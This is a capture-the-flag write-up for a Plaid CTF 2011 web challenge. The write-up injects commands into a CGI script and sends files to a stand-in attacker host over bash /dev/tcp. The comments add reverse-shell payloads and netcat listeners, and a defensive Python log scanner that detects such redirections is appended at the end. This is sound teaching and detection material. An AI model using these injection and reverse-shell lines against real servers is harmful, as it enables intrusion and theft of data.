Plaid CtF 2011 – Writeup #16
The Plaid Parliament of Pwning organized their own Capture-the-Flag (CtF) contest this past weekend. It was an excellent CtF with about 36 challenges covering trivia, exploitation, reverse engineering, web exploitation, cryptography, and forensics.
My writeup for #16 – Plain sight [200 pts] web
The problem was
The time to strike is now! This fiendish AED employee decided to hide secret data on this website (http://a4.amalgamated.biz/cgi-bin/chroot.cgi)
It seems that the employee was in the middle of creating the website when our operatives stumbled upon it.
The good news is that there are surely bugs in the development version of this problem, the bad news is currently no feedback printed to users.
Some of our leet operatives have determined a little bit about the machine: it runs in a read-only environment with only
bash cat dc expand grep hd head id less ls more nl od pr rev sh sleep sort sum tail tar tr true tsort ul wc yes
installed. Find what AED is hiding, good luck and godspeed.
There was a URL http://a4.amalgamated.biz/cgi-bin/chroot.cgi that allowed remote code execution.
bash, cat, less, more, ls were allowed.
First thing I did was check whether bash TCP connections were allowed, using:
http://a4.amalgamated.biz/cgi-bin/chroot.cgi?ls>/dev/tcp/MYIP/5000
That seemed to work. So then I listed the directories one by one until I bumped into:
I used http://a4.amalgamated.biz/cgi-bin/chroot.cgi?cat%20keyfolder/key>/dev/tcp/MYIP/5000 with the port forwarded to my PC and a netcat listener running in a loop:
while [ 1 ]
do
nc -l -v -p 5000
done
The answer was esc4p3_str1ng5.
Fun times!
We made something similar, but with full shell I/O redirection and ncat
ncat -l -k -vv 6666   # never stops listening
http://a4.amalgamated.biz/cgi-bin/chroot.cgi?bash&/dev/tcp/IP/6666
Two connections are established, but it works like a charm 🙂
comment system did not correctly escape the symbols…
http://a4.amalgamated.biz/cgi-bin/chroot.cgi?bash</dev/tcp/MYIP/6666 >&/dev/tcp/MYIP/6666
(hope this time works!)
please remove the IPs… 🙂
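Added here as a defender-side example (my code, not part of the writeup or the comments): the /dev/tcp redirections used above, both the `cmd>/dev/tcp/...` exfiltration form from the post and the `bash</dev/tcp/... >&/dev/tcp/...` form from the comments, are plainly visible in the web server's access log once the query string is URL-decoded, and since /dev/tcp is a bash feature rather than a file, the read-only chroot and the short binary list did nothing to stop it. The log lines, client addresses, timestamps and hosts below are constructed; the hosts stand in for the MYIP/IP placeholders in the post.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache-style access log lines (not real traffic): the first three
# carry the chroot.cgi query strings from the writeup and comments, the last is
# a benign request. Documentation addresses stand in for the MYIP/IP placeholders.
SAMPLE_LOG = """\
203.0.113.5 - - [23/Apr/2011:10:01:02 +0000] "GET /cgi-bin/chroot.cgi?ls>/dev/tcp/198.51.100.7/5000 HTTP/1.1" 200 0
203.0.113.5 - - [23/Apr/2011:10:03:14 +0000] "GET /cgi-bin/chroot.cgi?cat%20keyfolder/key>/dev/tcp/198.51.100.7/5000 HTTP/1.1" 200 0
203.0.113.9 - - [23/Apr/2011:10:05:00 +0000] "GET /cgi-bin/chroot.cgi?bash%3C/dev/tcp/198.51.100.7/6666%20%3E%26/dev/tcp/198.51.100.7/6666 HTTP/1.1" 200 0
203.0.113.20 - - [23/Apr/2011:10:06:30 +0000] "GET /cgi-bin/chroot.cgi?ls HTTP/1.1" 200 512
"""

# Common Log Format prefix up to the request target, which is what we decode.
REQUEST_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*"')
# bash's /dev/tcp/HOST/PORT (or udp) pseudo-path plus the redirection operator before it.
DEVNET_RE = re.compile(r"(?P<op>[<>]&?|&>)?\s*/dev/(?P<proto>tcp|udp)/(?P<host>[^/\s]+)/(?P<port>\d+)")
DIRECTION = {"<": "stdin from", ">": "stdout to", ">&": "stdout+stderr to",
             "&>": "stdout+stderr to", "": "reference to"}


def decode_query(target):
    """Return the URL-decoded query part of a request target ('' if none)."""
    _, _, query = target.partition("?")
    return unquote_plus(query)


def find_dev_tcp_redirections(log_text):
    """One dict per request whose decoded query redirects to /dev/tcp or /dev/udp:
    client, timestamp, decoded query and (proto, host, port, direction) tuples."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        query = decode_query(m["target"])
        endpoints = [(r["proto"], r["host"], int(r["port"]), DIRECTION[r["op"] or ""])
                     for r in DEVNET_RE.finditer(query)]
        if endpoints:
            hits.append({"client": m["client"], "ts": m["ts"],
                         "query": query, "endpoints": endpoints})
    return hits


if __name__ == "__main__":
    for hit in find_dev_tcp_redirections(SAMPLE_LOG):
        for proto, host, port, direction in hit["endpoints"]:
            print(f"{hit['ts']} {hit['client']} {direction} {proto}://{host}:{port}  [{hit['query']}]")
```

Decoding before matching matters: the comment's variant arrives with `<`, `>` and `&` percent-encoded, so a raw substring search for `>/dev/tcp` misses it while the benign `?ls` request is correctly left alone.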